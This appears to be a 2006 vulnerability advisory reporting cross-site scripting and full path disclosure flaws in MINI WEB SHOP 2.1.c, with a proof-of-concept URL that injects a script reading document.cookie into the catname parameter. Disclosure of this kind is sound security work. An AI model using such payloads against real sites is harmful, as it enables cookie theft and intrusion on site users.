Multiple Bugs in MINI WEB SHOP

2006.12.29

Credit: Linux_Drox ( Qptan )

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-6735 | CVE-2006-6734

CWE: N/A

Hello 
Vulnerable : MINI WEB SHOP
Version: 2.1.c
web : http://ObieWebsite.SourceForge.net

I Found some bugs ( XSS & Full Path  Disclosure ) in MINI WEB SHOP

XSS :
http://example.com/miniwebshop/modules/viewcategory.php?catname='><scrip
t>alert(document.cookie)</script>

Full Path  Disclosure :
http://example.com/miniwebshop/modules/viewcategory.php?catname=[anythin
g]

Discovery by Linux_Drox ( Qptan )
Linux_Drox (at) Saudi.Net (dot) Sa [email concealed]
www.LeZr.Com/vb

Best Regards ,,,

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Multiple Bugs in MINI WEB SHOP

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.